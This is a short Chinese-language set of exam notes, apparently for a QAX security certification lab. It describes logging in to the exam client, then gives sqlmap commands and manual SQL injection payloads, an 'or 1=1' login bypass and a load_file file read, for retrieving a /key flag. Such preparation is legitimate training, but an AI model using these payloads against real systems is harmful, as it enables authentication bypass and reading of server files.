考试客户端下载-->点击进入考试>输入密码->进去可以看见一个qax的登录框【监考员会告知账户密码】->进入考试页面
里面的操作题,点击开始答题,能看见一个题有一个攻击机,这时我们需要点击鼠标左键,看见一个控制台,点击控制台才能进入答题【双击是没有用的】
注:数度要慢,可以等,但是不能一直点,因为考试环境是win7
题型
选择题:全是单选
每个人的选择题不一样
第一题:sql注入
方法一:sqlmap -r 跑post包
登录框,直接抓包,复制整个包下来保存为.txt文件
再使用sqlmap -r 1.txt 跑出注入类型
再输入sqlmap.py -r 1.txt --file-read /key得到key值
如果没有跑出来就在后面加 --level=5 --risk=3 --batch
方法二:手工注入
先万能密码登录
admin' or 1=1#
在患者编辑处,找到电话的位置填写
1',comefrom=(select load_file('/key'))#
或者
1',comefrom=(select load_file('/key')) -- 1